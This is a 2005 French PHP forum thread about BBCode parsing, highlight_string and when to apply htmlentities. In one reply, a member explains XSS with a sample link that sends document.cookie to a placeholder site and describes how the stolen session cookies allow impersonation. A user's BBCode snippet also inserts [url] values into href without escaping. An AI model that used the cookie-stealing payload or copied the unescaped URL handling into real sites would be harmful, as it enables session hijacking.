le code php en couleur

page 1 page 2
Répondre
manu56
le 30/09/2005 à 12:29
manu56
Déconnecté
Ouai lol je me rends compte maintenant de la connerei que j'ai faite !!!
Bon ya plus qu'a modifié quelques 100 scripts que j'ai pu faire comme ca xD
Enfin ca permettra de remettre mon code au propre :p
Merci du conseil @+
Bzh
le 30/09/2005 à 18:29
Bzh
Déconnecté
Arf !!! Bon courage...
lordstriker
le 01/10/2005 à 15:56
lordstriker
Déconnecté
Mais si on ne fait pas de htmlentities, ca ne pose pas un problème de sécurité pour le site?
Bzh
le 01/10/2005 à 16:08
Bzh
Déconnecté
Si !!! Mais seulement lors de l' affichage !!!!

Il est très important de passer par cette fonction...

Afin d' éviter les attaques par XSS !!!
lordstriker
le 01/10/2005 à 17:41
lordstriker
Déconnecté
XSS=?
:S Désolé, je connaissais le SQL injection, mais je ne connais pas cette abréviation.
Bzh
le 01/10/2005 à 18:17
Bzh
Déconnecté
XSS = Cross site scripting

Appelé XSS afin de ne pas confondre avec les feuilles de styles CSS !!!

XSS est le fait d' injecter des scripts javascript ou de l' html !!!

La faille se trouve souvent des les forums amateurs.

exemple: <a href="javascript:location='http://ton_site.com/index.php?cookie='+document.cookie"> Cliquez ici pour voir une superbe photo</a>

Je te laisse diviner le danger de ce script !!!

Bye...
lordstriker
le 01/10/2005 à 21:53
lordstriker
Déconnecté
En gros le visiteur met ce qu'il veut dans l'objet document.cookie?
Bzh
le 02/10/2005 à 01:12
Bzh
Déconnecté
Heu !!!!

document.cookie renvoit la valeur des cookies !!!

Donc cela veut dire cookie de sessions. Il a donc 180mn pour émuler le cookie et se connecter à la place de la personne...

Il récupère aussi le cookie du choi du design (site multi-couleur), enfin bon pas tellement dangereux mais il récupère aussi le cookie de l' auto-connexion. Et sa beaucoup plus grave. Pour peut que le systeme de gestion des droits d' admin se passe par un cookie, bin il aura tous les droits des admins...

Pas super du tout...

Bye...
manu56
le 02/10/2005 à 18:46
manu56
Déconnecté
yoyo !!
J'ai un soucis,
Quand dois je utiliser le htmlentities?...
J'ai essayer plusieurs solutions qui me mettaient des &eacute ou qui m'affichait le code html de ma balise ]code[ traité avec le hightlight_string :/
voici mon code :
  1.  
  2. function highlight($tab) {
  3.          return highlight_string($tab[1], true);
  4.       }
  5. //Je recupère mon texte brut de ma bdd dans $texte ...
  6. $texte=stripslashes(trim($intro['contenu']));
  7.  
  8. $bbcode= array (
  9. "/\[b\](.+?)\[\/b\]/si",
  10. "/\[i\](.+?)\[\/i\]/si",
  11. "/\[u\](.+?)\[\/u\]/si",
  12. "/\[url=(.+?)\](.+?)\[\/url\]/si",
  13. "/\[url\](.+?)\[\/url\]/si",
  14. "#\[code\](.+)\[/code\]#isU"
  15. );
  16. $htmlcode= array(
  17. "<b>$1</b>",
  18. "<i>$1</i>",
  19. "<u>$1</u>",
  20. "<a href=\"$1\">$2</a>",
  21. "<a href=\"$1\">$1</a>",
  22. "<div class=\"code\"> [code]$1 
</div>"
);

$texte=preg_replace($bbcode,$htmlcode,$texte);
$texte = preg_replace_callback('#\[code\](.+)\[/code\]#isU', 'highlight' ,$texte);

echo $texte;

[/code]

Merci de votre aide :)
Bzh
le 02/10/2005 à 19:45
Bzh
Déconnecté
Tu utilises le htmlentities JUSTE à la sortie de ta base de donnée. SURTOUT pas après avoir généré les balises html pour ton bbcode !!!!

Sinon, là ton bbcode ne te servira plus à rien !!!
manu56
le 02/10/2005 à 21:57
manu56
Déconnecté
bah oui mais je me tape tous les &eacute et compagnie et ma balise code affiche ca :
  1. &lt;?
  2.  
  3. echo &quot;Je kif le php&quot;;
  4.  
  5. ?&gt;
  6.  

:/
LA GLOBULE
le 02/10/2005 à 22:39
LA GLOBULE
Déconnecté
111 111 111 x 111 111 111 = 12 345 678 987 654 321
Normal, il ne faut pas faire de htmlentities sur le contenu de [ code ]
manu56
le 02/10/2005 à 22:52
manu56
Déconnecté
J'abuse peut-etre mais comment faire pour appliquer htmlentities sur une partie d'une chaine (sans prendre en compte le code cntenue dans [ code ])smiley
LA GLOBULE
le 03/10/2005 à 00:56
LA GLOBULE
Déconnecté
111 111 111 x 111 111 111 = 12 345 678 987 654 321
Avec une expression régulière :)
manu56
le 03/10/2005 à 12:45
manu56
Déconnecté
oui justement c'est ca le problème ^^
Trop de mal avec les expressions régulière :/
Va falloir que je m'y mette sérieusement xD
page 1 page 2
Répondre
Accès rapide :

Remonter Remonter
L'éditeur javascript - CSS - Gentoo - Tutoriaux PHP - Tutoriels PHP - Php - Breizh Blog